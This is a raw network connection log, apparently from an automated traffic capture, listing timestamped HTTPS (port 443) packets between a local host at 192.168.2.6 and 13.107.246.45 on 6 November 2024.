                                              Nov 6, 2024 17:03:20.728481054 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:20.728559017 CET50163443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.728714943 CET50163443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:20.728729010 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.169852972 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.170627117 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.170665979 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.171078920 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.171088934 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.396759033 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.396902084 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.396996021 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.397005081 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.397269964 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.397300005 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.397315025 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.397315025 CET50162443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.397324085 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.397330999 CET4435016213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.399966002 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.400006056 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.403831959 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.403971910 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.403985023 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.470649004 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.472942114 CET50163443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.472986937 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.473464966 CET50163443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.473470926 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.602158070 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.602232933 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.602322102 CET50163443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.602546930 CET50163443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.602570057 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.602581978 CET50163443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.602587938 CET4435016313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.605684042 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.605731964 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:21.605832100 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.606012106 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:21.606029987 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.137754917 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.140516043 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.140547037 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.140974045 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.140980005 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.267565966 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.267589092 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.267654896 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.267667055 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.267700911 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.267911911 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.267929077 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.267939091 CET50164443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.267944098 CET4435016413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.270634890 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.270658016 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.270734072 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.270978928 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.270989895 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.379961014 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.380417109 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.380445957 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.380856037 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.380861998 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.560574055 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.560847998 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.560920954 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.560925961 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.560970068 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.561021090 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.561037064 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.561047077 CET50165443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.561052084 CET4435016513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.563529968 CET50167443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.563549995 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.563628912 CET50167443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.563764095 CET50167443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.563777924 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.990694046 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.991147041 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.991166115 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:22.991611004 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:22.991615057 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.120187998 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.121629953 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.121697903 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.121726036 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.121757030 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.121794939 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.121809959 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.121822119 CET50166443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.121826887 CET4435016613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.124277115 CET50168443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.124320030 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.124408007 CET50168443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.124524117 CET50168443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.124533892 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.311824083 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.312345982 CET50167443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.312374115 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.312757969 CET50167443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.312763929 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.447973013 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.448048115 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.448128939 CET50167443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.479443073 CET50167443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.479473114 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.479486942 CET50167443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.479492903 CET4435016713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.528129101 CET50169443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.528160095 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:23.528249025 CET50169443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.539303064 CET50169443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:23.539324045 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.260802984 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.261291027 CET50168443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.261307001 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.261735916 CET50168443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.261740923 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.337924004 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.338507891 CET50169443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.338532925 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.338977098 CET50169443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.338983059 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.391472101 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.391635895 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.391693115 CET50168443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.391815901 CET50168443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.391849041 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.391869068 CET50168443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.391879082 CET4435016813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.394628048 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.394675970 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.394747972 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.394853115 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.394866943 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.474664927 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.474735975 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.474792004 CET50169443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.474941015 CET50169443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.474958897 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.474972010 CET50169443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.474982023 CET4435016913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.477669001 CET50171443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.477686882 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:24.477777958 CET50171443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.477940083 CET50171443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:24.477956057 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.148539066 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.149228096 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.149241924 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.149590015 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.149594069 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.235435963 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.235927105 CET50171443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.235970974 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.236385107 CET50171443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.236398935 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.285628080 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.285696983 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.285792112 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.285820007 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.285840988 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.285892010 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.286094904 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.286109924 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.286123037 CET50170443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.286128998 CET4435017013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.289053917 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.289087057 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.289175034 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.289334059 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.289345980 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.366229057 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.366887093 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.366964102 CET50171443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.367016077 CET50171443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.367016077 CET50171443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.367047071 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.367058039 CET4435017113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.369929075 CET50173443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.369978905 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:25.370064020 CET50173443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.370246887 CET50173443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:25.370260954 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.341197014 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.341775894 CET50173443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.341797113 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.342211008 CET50173443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.342216969 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.574590921 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.587918997 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.587939978 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.588371038 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.588376999 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.731595993 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.731688976 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.731744051 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.731760025 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.731812954 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.731859922 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.751991987 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.752015114 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.752026081 CET50172443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.752032042 CET4435017213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.821336031 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.821378946 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:26.821444035 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.821583033 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:26.821590900 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.548161983 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.548736095 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.548753023 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.549211025 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.549217939 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.676860094 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.676896095 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.676949024 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.677099943 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.677099943 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.677318096 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.677335024 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.677344084 CET50174443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.677350998 CET4435017413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.680466890 CET50175443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.680507898 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.680609941 CET50175443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.680830956 CET50175443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.680847883 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.945189953 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.945410013 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.946611881 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.946629047 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.946882963 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:27.947674990 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:27.995330095 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.423171043 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.423749924 CET50175443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.423780918 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.424189091 CET50175443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.424196005 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.553591967 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.553761005 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.553849936 CET50175443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.553961039 CET50175443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.553981066 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.553992987 CET50175443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.553998947 CET4435017513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.556869030 CET50176443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.556900024 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.556991100 CET50176443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.557159901 CET50176443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.557174921 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.815331936 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.815411091 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.815464020 CET50173443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.815701962 CET50173443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.815701962 CET50173443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.815717936 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.815728903 CET4435017313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.818762064 CET50177443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.818799973 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:28.818871975 CET50177443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.819076061 CET50177443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:28.819092035 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.547403097 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.548007011 CET50177443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.548031092 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.548480034 CET50177443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.548486948 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.676863909 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.676955938 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.677052975 CET50177443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.677383900 CET50177443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.677413940 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.677431107 CET50177443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.677437067 CET4435017713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.680347919 CET50178443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.680392981 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.680478096 CET50178443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.680669069 CET50178443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.680685997 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.694519997 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.694966078 CET50176443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.694983959 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.695415020 CET50176443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.695420980 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.833112955 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.833333969 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.833389997 CET50176443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.834317923 CET50176443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.834330082 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.834347963 CET50176443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.834353924 CET4435017613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.838110924 CET50179443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.838145971 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:29.838216066 CET50179443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.838356972 CET50179443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:29.838371038 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.656879902 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.656898975 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.657397032 CET50179443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.657434940 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.657444000 CET50178443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.657478094 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.657887936 CET50179443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.657893896 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.657932997 CET50178443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.657938957 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.785885096 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.785975933 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.786036968 CET50179443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.786217928 CET50179443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.786240101 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.786251068 CET50179443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.786257029 CET4435017913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.786958933 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.787022114 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.787075043 CET50178443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.787219048 CET50178443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.787237883 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.787250996 CET50178443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.787256956 CET4435017813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.789273024 CET50181443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.789314032 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.789333105 CET50182443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.789361000 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.789412975 CET50181443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.789434910 CET50182443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.789554119 CET50181443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.789571047 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:30.789582968 CET50182443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:30.789593935 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.519124985 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.519922018 CET50181443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.519939899 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.520343065 CET50181443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.520348072 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.537970066 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.538482904 CET50182443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.538501024 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.538901091 CET50182443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.538909912 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.647389889 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.647423983 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.647460938 CET50181443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.647478104 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.647564888 CET50181443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.647661924 CET50181443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.647680044 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.647690058 CET50181443192.168.2.613.107.246.45
